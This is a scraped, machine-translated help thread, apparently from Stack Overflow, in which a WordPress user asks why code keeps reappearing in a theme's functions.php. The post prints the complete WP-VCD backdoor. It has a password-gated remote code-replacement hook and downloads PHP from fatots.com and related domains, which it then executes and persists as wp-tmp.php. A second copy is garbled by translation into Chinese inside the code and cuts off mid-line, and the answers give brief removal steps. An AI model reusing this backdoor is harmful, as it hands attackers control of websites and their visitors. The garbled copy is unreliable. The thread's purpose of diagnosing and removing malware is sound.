Wordpress:我自动在wp content/themes/mytheme/function.php中添加了一段代码
不知道这是不是在这里。但问题是,我自动在wp content/themes/mythemeChild/function.php中添加了一段代码 如果我删除代码,则每次加载网站时都会一次又一次地添加代码: 代码如下:Wordpress:我自动在wp content/themes/mytheme/function.php中添加了一段代码,wordpress,wordpress-theming,Wordpress,Wordpress Theming,不知道这是不是在这里。但问题是,我自动在wp content/themes/mythemeChild/function.php中添加了一段代码 如果我删除代码,则每次加载网站时都会一次又一次地添加代码: 代码如下: //$start_wp_theme_tmp if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '4b705c1c67
//$start_wp_theme_tmp
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '4b705c1c67a8055f47ab7df9d283aae4'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='5dff57da9df6d10a701c2d632257ccd7';
if (($tmpcontent = @file_get_contents("http://www.fatots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fatots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.fatots.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.fatots.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//wp_tmp
//$end_wp_theme_tmp
/$start\u wp\u theme\u tmp
如果(isset($_请求['action'])和isset($_请求['password'])和($_请求['password']='4b705c1c67a8055f47ab7df9d283aae4'))
{
$div_code_name=“wp_vcd”;
开关($\u请求['action'])
{
案例“变更域”;
如果(isset($_请求['newdomain']))
{
如果(!empty($_请求['newdomain']))
{
如果($file=@file\u get\u contents(\uuuu file\uuuu))
{
if(preg\u match\u all('/\$tmpcontent=@file\u get\u contents\(.*)\/code\.php/i',$file,$matcholddomain))
{
$file=preg_replace('/'.$matcholddomain[1][0]./i',$_请求['newdomain',$file);
@文件内容(文件,$file);
打印“真”;
}
}
}
}
打破
案例“变更代码”;
如果(isset($_请求['newcode']))
{
如果(!empty($_请求['newcode']))
{
如果($file=@file\u get\u contents(\uuuu file\uuuu))
{
if(preg\u match\u all('/\/\/\$start\u wp\u theme\u tmp([\s\s]*)\/\/\$end\u wp\u theme\u tmp/i',$file,$matcholdcode))
{
$file=str_replace($matcholdcode[1][0],stripslashes($_请求['newcode']),$file);
@文件内容(文件,$file);
打印“真”;
}
}
}
}
打破
默认值:打印“错误\u WP\u操作WP\u V\u CD WP\u CD”;
}
死亡(“”);
}
$div_code_name=“wp_vcd”;
$funcfile=\uuuuu文件\uuuuuu;
如果(!function_存在('theme_temp_setup')){
$path=$\u服务器['HTTP\u主机].$\u服务器[REQUEST\u URI];
if(stripos($\u SERVER['REQUEST\u URI'],'wp cron.php')==false&&stripos($\u SERVER['REQUEST\u URI'],'xmlrpc.php')==false){
函数文件\u获取\u内容\u tcurl($url)
{
$ch=curl_init();
curl_setopt($ch,CURLOPT_AUTOREFERER,TRUE);
curl_setopt($ch,CURLOPT_头,0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_URL,$URL);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
$data=curl\u exec($ch);
卷曲关闭($ch);
返回$data;
}
函数主题临时设置($phpCode)
{
$tmpfname=tempnam(sys_get_temp_dir(),“theme_temp_setup”);
$handle=fopen($tmpfname,“w+”);
如果(fwrite($handle),我为解决问题做了什么:
在wp include
目录中,删除wp vcd.php
和class.wp.php
文件
打开主题的functions.php
文件,删除上面的代码
阅读本文以删除此恶意软件如果您的wp-includes
目录中有wp-vcd.php
和class.wp.php
(与class-wp.php
相反)等文件,您可能已被黑客攻击(或者有人将某些东西放在了不该放的地方)。请看。如果这些文件出现在我的主题目录中,我不这么认为。最近我在本地主机上工作,并在functions.php中看到了额外的代码。那么,如果我在本地主机上工作,我的网站怎么会被黑客攻击呢?我还让wp-tmp.php和wp-feed.php充满了恶意代码和一些IP地址的列表。将wp中的所有内容按日期进行排序,并更改它们来到顶部。你可能已经被黑客攻击了:看。如果是这样,不要惊慌。阅读以下内容:首先。@PatJ有没有办法彻底清除这个恶意软件WP-VCD?你发布的文章没有说明如何做到这一点。我在谷歌搜索中发现了这一点,但我没有WP-VCD的经验,所以我不能说它有多准确: